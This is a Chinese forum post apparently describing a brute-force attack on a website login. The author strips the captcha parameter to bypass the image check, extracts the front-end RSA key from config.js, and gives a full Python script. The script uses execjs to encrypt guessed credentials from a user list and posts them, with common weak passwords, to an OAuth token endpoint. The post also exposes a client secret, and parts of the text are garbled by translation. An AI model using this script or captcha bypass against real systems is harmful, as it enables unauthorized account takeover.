设为首页收藏本站
切换到宽版

电脑疯子技术论坛|电脑极客社区

 找回密码
 注册

QQ登录

只需一步,快速开始

电脑疯子技术论坛|电脑极客社区»技术论坛 电脑疯子|资源分享 电脑教程分享 前端RSA被丑爆破脚本
返回列表 发新帖

[网络安全] 前端RSA被丑爆破脚本

[复制链接]
zhaorong 发表于 2021-8-3 15:10:18 | 显示全部楼层 |阅读模式
某网站登录的时候如下:

184217jh2f5225d2f92o55.png.thumb.jpg

然后我删除j_authcode以及一些有用的参数,可以绕过图形验证码

999.jpg

那么这样就可以进行爆破了。不过我们可以看到用户名和密码 这究竟是什么玄妙呢?我们来看看前端代码。

184219qogx3gydmgvm5fzd.png.thumb.jpg

可以看到这里是RSA智能。然后通过断点查看指数和模量的值。

184219ecaz0ubgq85cx25a.png.thumb.jpg

值是,搜索后发现就存储config.js中,固定私钥在RSA的模数。
但这是一个 256 位公钥的 RSA,在其他环境中几乎找不到这种可能性的项目 而 js 出现了RSA.js/Barrett.js/BigInt.js
这么一个早期项目。这种时候就需要用python去调js代码来进行洗。
先写出js智能的代码来看看效果:
  1. <s cript src="./rsa/RSA.js" type="text/j avas cript"></s cript>
  2. <s cript src="./rsa/BigInt.js" type="text/j avas cript"></s cript>
  3. <s cript src="./rsa/Barrett.js" type="text/j avas cript"></s cript>
  4. <s cript src="./rsa/config.js" type="text/j avas cript"></s cript>
  5. <s cript>
  6. functiona(paramStr){
  7.     setMaxDigits(130);
  8.     key = new RSAKeyPair(exponent, "", modulus);
  9.     return encryptedString(key,encodeURIComponent(paramStr));

  11.     }
  12. qqq= a("admin");
  13. a lert(qqq);
  14. </s cript>
复制代码

184220irz0c456z3x03lo3.png.thumb.jpg

这里可以看到和Burp Suite里是一模一样然后把4个js带html里的js代码合并到同一个文件里
用python的execjs库去调。
  1. import execjs
  2. defrsa(str):
  3.     file = 'RSA.js'
  4.     ctx = execjs.compile(open(file).read())
  5.     js = 'a("'+str+'")'
  6.     params = ctx.e val(js)
  7.     return params
  8. print(rsa("admin"))
  9. [align=left]
复制代码

184221mmfhe3u3gmhhj4jb.png.thumb.jpg

写出来最后破破的剧本:
  1. import requests
  2. import execjs
  3. requests.packages.urllib3.disable_warnings()
  4. defurlpost(username,password):
  5.     rusername = rsa(username)
  6.     rpassword = rsa(password)
  7.     url = "https://x.com/oauth/token"
  8.     header = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:79.0)Ge
  9. cko/20100101 Firefox/79.0",
  10.           "X-Requested-With": "X MLHttpRequest",
  11.           "Content-Type": "application/x-www-form-urlencoded"
  12.           }
  13.     cookie = {}
  14.     data = {"username":rusername,
  15.             "password":rpassword,
  16.             "grant_type":"password",
  17.             "scope":"service",
  18.             "client_id":"spm",
  19.             "client_secret":"sinoprof"
  20.             }
  21.     r =requests.post(url,cookies=cookie,headers=header,data=data,allo
  22. w_redirects=False,verify=False)
  23.     print(r.status_code)
  24.     if r.status_code == 200:
  25.         print(username+password+"success")
  26.         exit()
  27.     else:
  28.         print(username+password+"error")
  29. defrsa(str):
  30.     file = 'RSA.js'
  31.     ctx = execjs.compile(open(file).read())
  32.     js = 'a("'+str+'")'
  33.     params = ctx.e val(js)
  34.     return params
  35. folist= open('user.txt','r')
  36. for i in folist.readlines():
  37.     i = i.replace('\n','')
  38.     urlpost(i,i+"!@#456")
  39.     urlpost(i,i+"!@#123")
  40.     urlpost(i,"123456")
复制代码

最终效果如下图所示:

8.png
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册

本版积分规则

手机版|小黑屋|VIP|电脑疯子技术论坛 ( Computer madman team )

GMT+8, 2025-2-2 20:30

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表